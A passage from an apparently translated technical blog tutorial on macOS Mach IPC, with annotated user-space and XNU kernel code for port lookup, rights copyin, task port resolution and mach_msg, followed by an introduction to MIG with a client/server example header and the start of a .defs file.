information</span></span><br><span class="line">            &amp;port_info_count);              <span class="comment">// size returned</span></span><br><span class="line">        <span class="keyword">if</span> (kr == KERN_SUCCESS)</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8d &quot;</span>, port_limits.mpl_qlimit);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8s &quot;</span>, <span class="string">&quot;-&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// get miscellaneous information about associated rights and messages</span></span><br><span class="line">        port_info_count = MACH_PORT_RECEIVE_STATUS_COUNT;</span><br><span class="line">        kr = <span class="built_in">mach_port_get_attributes</span>(task, names[i], MACH_PORT_RECEIVE_STATUS,</span><br><span class="line">                                      (<span class="type">mach_port_info_t</span>)&amp;port_status,</span><br><span class="line">                                      &amp;port_info_count);</span><br><span class="line">        <span class="keyword">if</span> (kr == KERN_SUCCESS)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8d %8d %8d &quot;</span>,</span><br><span class="line">                   port_status.mps_seqno,     <span class="comment">// current sequence # for the port</span></span><br><span class="line">                   port_status.mps_msgcount,  <span class="comment">// # of messages currently queued</span></span><br><span class="line">                   port_status.mps_sorights); <span class="comment">// # of send-once rights</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span 
class="keyword">else</span></span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;%8s %8s %8s &quot;</span>, <span class="string">&quot;-&quot;</span>, <span class="string">&quot;-&quot;</span>, <span class="string">&quot;-&quot;</span>);</span><br><span class="line">        <span class="built_in">print_mach_port_type</span>(types[i]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">vm_deallocate</span>(mytask, (<span class="type">vm_address_t</span>)names, ncount * <span class="built_in">sizeof</span>(<span class="type">mach_port_name_t</span>));</span><br><span class="line">    <span class="built_in">vm_deallocate</span>(mytask, (<span class="type">vm_address_t</span>)types, tcount * <span class="built_in">sizeof</span>(<span class="type">mach_port_type_t</span>));</span><br><span class="line"></span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Sample output:</p><p><img src="/2021/12/mach_ipc_intro/image-20211231141800537.png" alt="image-20211231141800537"></p><h4 id="c-mach-port-request-notification">c. 
mach_port_request_notification</h4><p>When a mach port is destroyed, the rights that other tasks hold to it turn into dead names, so a sender learns that the target mach port is gone when it tries to send a message.</p><p>If a sender instead wants to be <strong>notified as soon as</strong> the target mach port is destroyed, rather than <strong>finding out only when it next sends data</strong>, <code>mach_port_request_notification</code> is the function to use. It registers a notification request for events on the target mach port. Its declaration is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span>   <span class="title">mach_port_request_notification</span></span></span><br><span class="line"><span class="function">                <span class="params">(<span class="type">ipc_space_t</span>                               task,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_name_t</span>                          name,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_id_t</span>                          variant,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_mscount_t</span>                       sync,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_port_send_once_t</span>                   notify,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">mach_msg_type_name_t</span>               notify_type,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span 
class="type">mach_port_send_once_t</span>                *previous)</span></span>;</span><br></pre></td></tr></table></figure><p>The individual parameters are not described for now; they will be filled in once the function is actually used.</p><h3 id="2-Kernel-Mode">2. Kernel Mode</h3><h4 id="a-ipc-entry-lookup">a. ipc_entry_lookup</h4><blockquote><p>Note: ipc_right_lookup_write is a wrapper around this function, and ipc_right_lookup_read is in turn a macro for ipc_right_lookup_write.</p></blockquote><p>Purpose: given a <strong>user-space mach port name</strong>, look up the corresponding <strong>ipc_entry_t</strong> in the <strong>kernel</strong>, within the <strong>IPC space</strong> of the <strong>current task</strong>.</p><p>Here is the code first:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ipc_entry_t</span></span></span><br><span class="line"><span class="function"><span class="title">ipc_entry_lookup</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">ipc_space_t</span>        space,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_name_t</span>    name)</span></span></span><br><span 
class="function"></span>&#123;</span><br><span class="line">    <span class="type">mach_port_index_t</span> index;</span><br><span class="line">    <span class="type">ipc_entry_t</span> entry;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">is_active</span>(space));</span><br><span class="line">    <span class="comment">// Get the table index encoded in name</span></span><br><span class="line">    index = <span class="built_in">MACH_PORT_INDEX</span>(name);</span><br><span class="line">    <span class="keyword">if</span> (index &lt; space-&gt;is_table_size) &#123;</span><br><span class="line">        entry = &amp;space-&gt;is_table[index];</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">IE_BITS_GEN</span>(entry-&gt;ie_bits) != <span class="built_in">MACH_PORT_GEN</span>(name) ||</span><br><span class="line">            <span class="built_in">IE_BITS_TYPE</span>(entry-&gt;ie_bits) == MACH_PORT_TYPE_NONE) &#123;</span><br><span class="line">            entry = IE_NULL;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        entry = IE_NULL;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>((entry == IE_NULL) || <span class="built_in">IE_BITS_TYPE</span>(entry-&gt;ie_bits));</span><br><span class="line">    <span class="keyword">return</span> entry;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>ipc_entry_lookup shows that a mach_port_name_t (aka unsigned int) is split into two parts, MACH_PORT_INDEX and MACH_PORT_GEN. They are packed as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_PORT_INDEX(name)       ((name) &gt;&gt; 8)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_PORT_GEN(name)         (((name) &amp; 0xff) &lt;&lt; 24)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_PORT_MAKE(index, gen)  \</span></span><br><span class="line"><span class="meta">        (((index) &lt;&lt; 8) | (gen) &gt;&gt; 24)</span></span><br></pre></td></tr></table></figure><p>Here:</p><ul><li>MACH_PORT_INDEX is used as an index into <code>task-&gt;ipc_space-&gt;is_table</code>, somewhat like a file descriptor.</li><li>MACH_PORT_GEN tells which generation the current mach port belongs to. My guess is that this distinguishes the port from earlier, already released ports that used the same index, so the two cannot be confused.</li></ul><p>Also note how the 32 bits of a mach_port_name_t are divided:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">+--------------------+-----+</span><br><span class="line">|   is_table index   | gen |</span><br><span class="line">+--------------------+-----+</span><br><span class="line">32                   8     0</span><br></pre></td></tr></table></figure><p>The ie_bits field of the ipc_entry structure, however, uses its 32 bits like this:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">+-----+-----+------+----------------+</span><br><span class="line">| gen |     | type | user-reference |</span><br><span class="line">+-----+-----+------+----------------+</span><br><span class="line">32    24    21     16               0</span><br></pre></td></tr></table></figure><p>The generation therefore sits in the low 8 bits of the name but in the high 8 bits of ie_bits, which is why MACH_PORT_GEN shifts it left by 24 bits before ipc_entry_lookup compares it with IE_BITS_GEN(entry-&gt;ie_bits).</p><h4 
id="b-ipc-right-copyin">b. ipc_right_copyin</h4><blockquote><p>A quick note on the function naming convention first:</p><ul><li>xxx_copyin: called on the sending side</li><li>xxx_copyout: called on the receiving side</li></ul></blockquote><p>Depending on the <strong>msgt_name</strong> (mach_msg_type_name_t) passed in, ipc_right_copyin modifies certain fields of the <strong>ipc_port structure</strong> referenced by the <strong>target ipc_entry_t</strong> and <strong>returns a pointer to that ipc_port structure to its caller</strong>.</p><p>Recalling the fields of the ipc_port structure shown earlier, this function <strong>mainly</strong> increments these three:</p><blockquote><p>There are a few others that I have not pasted here.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">mach_port_mscount_t</span> ip_mscount; <span class="comment">// number of make-send operations</span></span><br><span class="line"><span class="type">mach_port_rights_t</span> ip_srights;  <span class="comment">// number of send rights that currently exist</span></span><br><span class="line"><span class="type">mach_port_rights_t</span> ip_sorights; <span class="comment">// number of send-once rights</span></span><br></pre></td></tr></table></figure><p>This function manipulates mach port rights. The msgt_name values that select how a right is handled are mainly the following:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MOVE_RECEIVE      16    <span class="comment">/* Must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MOVE_SEND         17    <span class="comment">/* Must hold send right(s) */</span></span></span><br><span class="line"><span class="meta">#<span 
class="keyword">define</span> MACH_MSG_TYPE_MOVE_SEND_ONCE    18    <span class="comment">/* Must hold sendonce right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_COPY_SEND         19    <span class="comment">/* Must hold send right(s) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MAKE_SEND         20    <span class="comment">/* Must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_MAKE_SEND_ONCE    21    <span class="comment">/* Must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_COPY_RECEIVE      22    <span class="comment">/* NOT VALID */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_DISPOSE_RECEIVE   24    <span class="comment">/* must hold receive right */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_DISPOSE_SEND      25    <span class="comment">/* must hold send right(s) */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26    <span class="comment">/* must hold sendonce right */</span></span></span><br></pre></td></tr></table></figure><p>There is no need to dig into this function for now. It is enough to know that, besides some right bookkeeping, it returns the ipc_port structure referenced by the ipc_entry to its caller.</p><h4 id="c-port-name-to-task">c. 
port_name_to_task</h4><p>Purpose: in <strong>kernel space</strong>, resolve a user-supplied <strong>task port name</strong> (a plain numeric value) to a pointer to the task structure it actually refers to.</p><p>The code is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">task_t</span></span></span><br><span class="line"><span class="function"><span class="title">port_name_to_task</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_name_t</span> name)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">ipc_port_t</span> kern_port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr;</span><br><span class="line">    <span class="type">task_t</span> task = TASK_NULL;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">MACH_PORT_VALID</span>(name)) &#123;</span><br><span class="line">        kr = <span class="built_in">ipc_object_copyin</span>(<span class="built_in">current_space</span>(), name,</span><br><span class="line">                       MACH_MSG_TYPE_COPY_SEND,</span><br><span 
class="line">                       (<span class="type">ipc_object_t</span> *) &amp;kern_port);</span><br><span class="line">        <span class="keyword">if</span> (kr != KERN_SUCCESS)</span><br><span class="line">            <span class="keyword">return</span> TASK_NULL;</span><br><span class="line"></span><br><span class="line">        task = <span class="built_in">convert_port_to_task</span>(kern_port);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">IP_VALID</span>(kern_port))</span><br><span class="line">            <span class="built_in">ipc_port_release_send</span>(kern_port);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> task;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The function passes the task port name to ipc_object_copyin to obtain the ipc_port structure of the corresponding task port. convert_port_to_task then reads the ip_kobject field of that ipc_port structure and uses its value as the pointer to the target task structure.</p><h4 id="d-mach-msg-2">d. 
mach_msg</h4><p>mach_msg is the API that user code calls to send and receive mach messages.</p><p>Here is a diagram of the complete flow:</p><p><img src="/2021/12/mach_ipc_intro/image-20211231144049005.png" alt="image-20211231144049005"></p><p>mach_msg_overwrite_trap is the kernel function that actually handles sending and receiving for mach_msg. Its implementation has two parts, one for sending a message and one for receiving a message:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_overwrite_trap</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> mach_msg_overwrite_trap_args *args)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">mach_vm_address_t</span>       msg_addr = args-&gt;msg;</span><br><span class="line">    <span class="type">mach_msg_option_t</span>       option = args-&gt;option;</span><br><span class="line">    <span class="type">mach_msg_size_t</span>         send_size = args-&gt;send_size;</span><br><span class="line">    <span 
class="type">mach_msg_size_t</span>         rcv_size = args-&gt;rcv_size;</span><br><span class="line">    <span class="type">mach_port_name_t</span>        rcv_name = args-&gt;rcv_name;</span><br><span class="line">    <span class="type">mach_msg_timeout_t</span>      msg_timeout = args-&gt;timeout;</span><br><span class="line">    <span class="type">mach_msg_priority_t</span>     <span class="keyword">override</span> = args-&gt;<span class="keyword">override</span>;</span><br><span class="line">    <span class="type">mach_vm_address_t</span>       rcv_msg_addr = args-&gt;rcv_msg;</span><br><span class="line">    __unused <span class="type">mach_port_seqno_t</span> temp_seqno = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">mach_msg_return_t</span>  mr = MACH_MSG_SUCCESS;</span><br><span class="line">    <span class="type">vm_map_t</span> map = <span class="built_in">current_map</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Only accept options allowed by the user */</span></span><br><span class="line">    option &amp;= MACH_MSG_OPTION_USER;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (option &amp; MACH_SEND_MSG) &#123; <span class="comment">/* ... ipc_kmsg_send(xxx) ... */</span> &#125;</span><br><span class="line">    <span class="keyword">if</span> (option &amp; MACH_RCV_MSG) &#123; <span class="comment">/* ... ipc_mqueue_receive_on_thread(xxx) ... 
*/</span> &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> MACH_MSG_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>ipc_kmsg_t</code> represents the kernel message waiting to be sent. The structure is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_size_t</span>            ikm_size;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span>            *ikm_next;        <span class="comment">/* next message on port/discard queue */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_kmsg</span>            *ikm_prev;        <span class="comment">/* prev message on port/discard queue */</span></span><br><span class="line">    <span class="type">mach_msg_header_t</span>          *ikm_header;      <span class="comment">// pointer to the Mach message</span></span><br><span class="line">    <span class="type">ipc_port_t</span>                 ikm_prealloc;     <span class="comment">/* port we were preallocated from */</span></span><br><span class="line">    <span class="type">ipc_port_t</span>                 ikm_voucher;      <span class="comment">/* voucher port carried 
*/</span></span><br><span class="line">    <span class="type">mach_msg_priority_t</span>        ikm_qos;          <span class="comment">/* qos of this kmsg */</span></span><br><span class="line">    <span class="type">mach_msg_priority_t</span>        ikm_qos_override; <span class="comment">/* qos override on this kmsg */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">ipc_importance_elem</span> *ikm_importance;  <span class="comment">/* inherited from */</span></span><br><span class="line">    <span class="type">queue_chain_t</span>              ikm_inheritance;  <span class="comment">/* inherited from link */</span></span><br><span class="line">    <span class="type">sync_qos_count_t</span> sync_qos[THREAD_QOS_LAST];  <span class="comment">/* sync qos counters for ikm_prealloc port */</span></span><br><span class="line">    <span class="type">sync_qos_count_t</span> special_port_qos;           <span class="comment">/* special port qos for ikm_prealloc port */</span></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> MACH_FLIPC</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mach_node</span>           *ikm_node;        <span class="comment">/* Originating node - needed for ack */</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The structure has many fields; the one that matters here is ikm_header, which points to the Mach message waiting to be sent.</p><p>My background knowledge is limited, so the finer kernel details are left for a later, deeper analysis.</p><h2 id="八、MIG">VIII. MIG</h2><h3 id="1-概述">1. 
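Overview</h3><p>Any discussion of Mach IPC has to mention <strong>MIG (Mach Interface Generator)</strong>. This section does not go into the details of MIG usage or its syntax; it only covers what MIG does and why it matters.</p><p>As the examples above show, Mach IPC can be used for <strong>RPC (remote procedure call)</strong>. Put simply: <strong>when the Client &quot;calls&quot; a remote method, the Server receives the request over Mach IPC, actually executes the method, and sends the result back over Mach IPC, so the call looks transparent to the Client.</strong></p><p>If the Client needs to call <strong>many</strong> methods, developers not only have to <strong>implement the methods themselves</strong> but also have to <strong>hand-write</strong> the <strong>Mach IPC message handling and dispatching</strong>, which is <strong>repetitive, tedious, mechanical work</strong> and makes development very inefficient.</p><p>MIG takes over that second part, so developers can concentrate on implementing the methods.</p><p>From a <strong>user-written RPC specification file</strong> (a .defs file), MIG generates the client/server code. That code handles preparing, sending, receiving, and unpacking Mach messages. Because it is generated automatically, it is also more consistent and less error-prone.</p><p>MIG generates three files:</p><ol><li>A header file for users to include.</li><li>A client-side source file, to be linked with the rest of the client code.</li><li>A server-side source file, to be linked with the rest of the server code. This code takes care of receiving messages, dispatching them, calling the functions, and sending replies.</li></ol><p>Here is an example:<br><img src="/2021/12/mach_ipc_intro/image-20220105175226555.png" alt="image-20220105175226555"></p><h3 id="2-CS-架构程序示例">2. Client/Server Example Program</h3><h4 id="a-概述">a. Overview</h4><p>This part briefly shows how to build a simple client/server program with MIG.</p><p>In this project, the Server program provides two interfaces:</p><ul><li><code>string_length</code>: returns the length of the string passed in</li><li><code>factorial</code>: computes the factorial of the number passed in</li></ul><blockquote><p>This example comes from *OS Internals Vol. 1</p></blockquote><h4 id="b-杂项公共头文件">b. 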
Shared misc header</h4><p>First, the <strong>misc</strong> header shared by the Client and the Server:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// misc_types.h </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">ifndef</span> _MISC_TYPES_H_ </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> _MISC_TYPES_H_ </span></span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span> </span></span><br><span 
class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span> </span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span> </span></span><br><span class="line"> </span><br><span class="line"><span class="comment">// The server port will be registered under this name. </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MIG_MISC_SERVICE <span class="string">&quot;MIG-miscservice&quot;</span> </span></span><br><span class="line"> </span><br><span class="line"><span class="comment">// Data representations </span></span><br><span class="line"><span class="keyword">typedef</span> <span class="type">char</span> <span class="type">input_string_t</span>[<span class="number">64</span>]; </span><br><span class="line"><span class="keyword">typedef</span> <span class="type">int</span> <span class="type">xput_number_t</span>; </span><br><span class="line"> </span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123; </span><br><span class="line">    <span class="type">mach_msg_header_t</span> head; </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// The following fields do not represent the actual layout of the request </span></span><br><span class="line">    <span class="comment">// and reply messages that MIG will use. 
However, a request or reply </span></span><br><span class="line">    <span class="comment">// message will not be larger in size than the sum of the sizes of these </span></span><br><span class="line">    <span class="comment">// fields. We need the size to put an upper bound on the size of an </span></span><br><span class="line">    <span class="comment">// incoming message in a mach_msg() call. </span></span><br><span class="line">    NDR_record_t NDR; </span><br><span class="line">    <span class="keyword">union</span> &#123; </span><br><span class="line">        <span class="type">input_string_t</span> string; </span><br><span class="line">        <span class="type">xput_number_t</span> number; </span><br><span class="line">    &#125; data; </span><br><span class="line">    <span class="type">kern_return_t</span>      RetCode; </span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">msg_misc_t</span>; </span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="type">xput_number_t</span> <span class="title">misc_translate_int_to_xput_number_t</span><span class="params">(<span class="type">int</span>)</span></span>; </span><br><span class="line"><span class="function"><span class="type">int</span>           <span class="title">misc_translate_xput_number_t_to_int</span><span class="params">(<span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"><span class="function"><span class="type">void</span>          <span class="title">misc_remove_reference</span><span class="params">(<span class="type">xput_number_t</span>)</span></span>; </span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">string_length</span><span class="params">(<span class="type">mach_port_t</span>, <span class="type">input_string_t</span>, <span class="type">xput_number_t</span> 
*)</span></span>; </span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">factorial</span><span class="params">(<span class="type">mach_port_t</span>, <span class="type">xput_number_t</span>, <span class="type">xput_number_t</span> *)</span></span>; </span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">endif</span> <span class="comment">// _MISC_TYPES_H_ </span></span></span><br></pre></td></tr></table></figure><p>This header defines two types, <code>input_string_t</code> and <code>xput_number_t</code>, and declares several functions.</p><p>Two of those functions are the target interfaces; the other three are called internally by the code MIG generates and are explained later.</p><p>The <code>msg_misc_t</code> structure is declared only so that the Server can specify the maximum message size when it calls mach_msg_server; it is never actually instantiated.</p><h4 id="c-RPC-defs">c. RPC defs</h4><p>Next, the defs file:</p><blockquote><p>The symbols used in the defs file are explained in comments inside the file itself, so they are not repeated below.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span 
class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * A &quot;Miscellaneous&quot; Mach Server </span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * File:    misc.defs </span></span><br><span class="line"><span class="comment"> * Purpose: Miscellaneous Server subsystem definitions </span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"> </span><br><span 
class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Subsystem identifier </span></span><br><span class="line"><span class="comment"> * Interface IDs in this MIG subsystem start at 500, and everything generated from this file is named after `misc`</span></span><br><span class="line"><span class="comment"> * The name also determines the names of the generated files such as `*Server.c` and `*User.c`</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line">Subsystem misc <span class="number">500</span>; </span><br><span class="line"> </span><br><span class="line"><span class="comment">/* </span></span><br><span class="line"><span class="comment"> * Type declarations </span></span><br><span class="line"><span class="comment"> * Type specification section: defines the data types of the call parameters</span></span><br><span class="line"><span class="comment"> *     MIG supports declaring simple, structured, pointer, and polymorphic types.</span></span><br><span class="line"><span class="comment"> */</span> </span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/std_types.defs&gt;</span> </span></span><br><span class="line"><span 